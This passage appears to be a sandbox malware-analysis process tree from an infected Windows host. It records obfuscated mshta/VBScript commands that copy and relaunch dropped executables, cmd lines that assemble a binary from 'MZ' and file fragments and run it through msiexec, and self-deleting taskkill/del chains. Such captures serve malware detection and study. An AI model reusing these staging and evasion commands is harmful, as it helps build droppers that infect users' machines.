                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:9184
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4906ef58-bc07-4631-b63d-12f1d188d94f\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:9128
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                              PID:8472
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                              PID:8116
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\913F.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\913F.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:8024
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9334.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\9334.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:7984
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9A0B.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9A0B.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:8856
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 9A0B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9A0B.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:8252
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            taskkill /im 9A0B.exe /f
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                            PID:6136
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                            PID:6632
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A71C.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A71C.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:8972
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBSCRipt: clOSe ( creaTEObJecT ("WsCRiPT.sheLL" ). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\A71C.exe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\A71C.exe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:9040
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\A71C.exe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "" == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\A71C.exe" ) do taskkill -IM "%~NxN" /f
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:6744
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe
                                                                                                                                                                                                                                                                                                                    wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:4808
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBSCRipt: clOSe ( creaTEObJecT ("WsCRiPT.sheLL" ). RUN( "C:\Windows\system32\cmd.exe /r cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF ""/p4nbpeM1nqd~Rrsm~Y "" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe"" ) do taskkill -IM ""%~NxN"" /f " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:3392
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /r cOpY /Y "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" wND_P0R7CSA.EXe && STArT wND_P0R7CSA.ExE /p4nbpeM1nqd~Rrsm~Y & iF "/p4nbpeM1nqd~Rrsm~Y " == "" for %N IN ( "C:\Users\Admin\AppData\Local\Temp\wND_P0R7CSA.EXe" ) do taskkill -IM "%~NxN" /f
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:196
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBScRiPt: cLose (cReateOBjECt ( "wscript.ShElL" ). RUN ("CmD /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = ""MZ"" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d & deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:8072
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c eCHO radmC:\Users\Admin\AppData\Local\TemprEl> 60EI.1 & ecHO | seT /P = "MZ" > OuVq.r &coPy /y /B OUVQ.R + NLmf_.Y + yT1Q99t.5 + 60Ei.1 NxXhJc.D & sTARt msiexec /y .\NXXHJC.d & deL NlMf_.Y YT1Q99t.5 60Ei.1 OuVq.r
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                PID:8660
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                    PID:8772
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OuVq.r"
                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                      PID:556
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                      msiexec /y .\NXXHJC.d
                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                        PID:8844
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                  taskkill -IM "A71C.exe" /f
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                  PID:7148
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AAB7.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\AAB7.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:8888
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:5264
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:2304
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:8180
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:8696
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:4812
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:6920
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:2108
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:6936
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:8420
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8800
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5528
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6984
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\tfhhbvt
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\tfhhbvt
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3896
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\tfhhbvt
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\tfhhbvt
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4932
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ivhhbvt
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\ivhhbvt
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:9104
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\buhhbvt
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\buhhbvt
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:8240
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:7584
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7556
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7388
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4476
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:6056
                                                                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8196
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{719de96e-a652-534f-b615-c6231f463305}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:5624
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                              DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5448
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:8416
                                                                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6164
                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7656
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:8616
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:7892
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:9180
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                            MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:4208
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:9040
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:8228
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6940
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7124.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7124.exe
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5232
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7124.exe"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\7124.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4208
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7124.exe"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\7124.exe") do taskkill -iM "%~Nxq" -f
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4684
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE
                                                                                                                                                                                                                                                                                                                                                                                                              ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw
                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:3880
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9032
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f
                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2820
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vBsCripT: ClOSe ( creAteObJecT ( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q * " , 0 , tRUe ) )
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4792
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = "MZ" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G+ TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q *
                                                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7080
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" ECho "
                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8236
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>WSyZI.4"
                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8336
